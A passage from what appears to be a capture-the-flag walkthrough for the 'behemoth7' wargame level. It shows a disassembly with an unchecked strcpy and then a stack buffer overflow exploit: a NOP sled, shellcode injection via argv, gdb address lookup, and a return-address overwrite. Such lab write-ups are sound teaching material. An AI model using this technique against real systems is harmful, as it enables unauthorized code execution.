c0 test eax,eax 53: 80485d0: 75 42 jne 8048614 <main+0xe9> 54: 80485d2: e8 39 fe ff ff call 8048410 <__ctype_b_loc@plt> 55: 80485d7: 8b 10 mov edx,DWORD PTR [eax] 56: 80485d9: 8b 45 fc mov eax,DWORD PTR [ebp-0x4] 57: 80485dc: 0f b6 00 movzx eax,BYTE PTR [eax] 58: 80485df: 0f be c0 movsx eax,al 59: 80485e2: 01 c0 add eax,eax 60: 80485e4: 01 d0 add eax,edx 61: 80485e6: 0f b7 00 movzx eax,WORD PTR [eax] 62: 80485e9: 0f b7 c0 movzx eax,ax 63: 80485ec: 25 00 08 00 00 and eax,0x800 64: 80485f1: 85 c0 test eax,eax 65: 80485f3: 75 1f jne 8048614 <main+0xe9> 66: 80485f5: a1 40 99 04 08 mov eax,ds:0x8049940 67: 80485fa: 68 d0 86 04 08 push 0x80486d0 68: 80485ff: 68 d8 86 04 08 push 0x80486d8 69: 8048604: 50 push eax 70: 8048605: e8 e6 fd ff ff call 80483f0 <fprintf@plt> 71: 804860a: 83 c4 0c add esp,0xc 72: 804860d: 6a 01 push 0x1 73: 804860f: e8 ac fd ff ff call 80483c0 <exit@plt> 74: 8048614: 83 45 fc 01 add DWORD PTR [ebp-0x4],0x1 75: 8048618: 8b 45 fc mov eax,DWORD PTR [ebp-0x4] 76: 804861b: 0f b6 00 movzx eax,BYTE PTR [eax] 77: 804861e: 84 c0 test al,al 78: 8048620: 74 09 je 804862b <main+0x100> 79: 8048622: 81 7d f4 ff 01 00 00 cmp DWORD PTR [ebp-0xc],0x1ff 80: 8048629: 7e 80 jle 80485ab <main+0x80> 81: 804862b: 8b 45 0c mov eax,DWORD PTR [ebp+0xc] 82: 804862e: 83 c0 04 add eax,0x4 83: 8048631: 8b 00 mov eax,DWORD PTR [eax] 84: 8048633: 50 push eax 85: 8048634: 8d 85 f4 fd ff ff lea eax,[ebp-0x20c] 86: 804863a: 50 push eax 87: 804863b: e8 70 fd ff ff call 80483b0 <strcpy@plt> 88: 8048640: 83 c4 08 add esp,0x8 89: 8048643: b8 00 00 00 00 mov eax,0x0 90: 8048648: c9 leave 91: 8048649: c3 ret
The Exploit
After we assemble our shellcode, we're going to use a nop sled to make life easier.
1: $ nasm -f bin -o shellcode.bin shellcode.asm 2: $ python3 -c 'import sys; sys.stdout.buffer.write(b"\x90"* 1024)' > sled.bin 3: $ cat sled.bin shellcode.bin > shellcode
Now we need the memory address of argv[2].
1: (gdb) b main 2: Breakpoint 1 at 0x8048534 3: (gdb) r $(python3 -c 'print("A" * 528, end="")') $(cat shellcode) 4: Starting program: /behemoth/behemoth7 $(python3 -c 'print("A" * 528, end="")') $(cat shellcode) 5: 6: Breakpoint 1, 0x08048534 in main () 7: (gdb) x/4wx $ebp 8: 0xffffcf48: 0x00000000 0xf7e2a286 0x00000003 0xffffcfe4 9: (gdb) x/3wx 0xffffcfe4 10: 0xffffcfe4: 0xffffd142 0xffffd156 0xffffd367 11: (gdb) x/s 0xffffd156 12: 0xffffd156: 'A' <repeats 200 times>... 13: (gdb)
0xffffd367 is the address of our shellcode. Because we have a nop
sled, I'm just going to estimate it as 0xffffd401.
1: $ /behemoth/behemoth7 $(python3 -c 'print("A" * 528, end="")'; printf "\x01\xd4\xff\xff") $(cat shellcode) 2: XXXXXXXXXX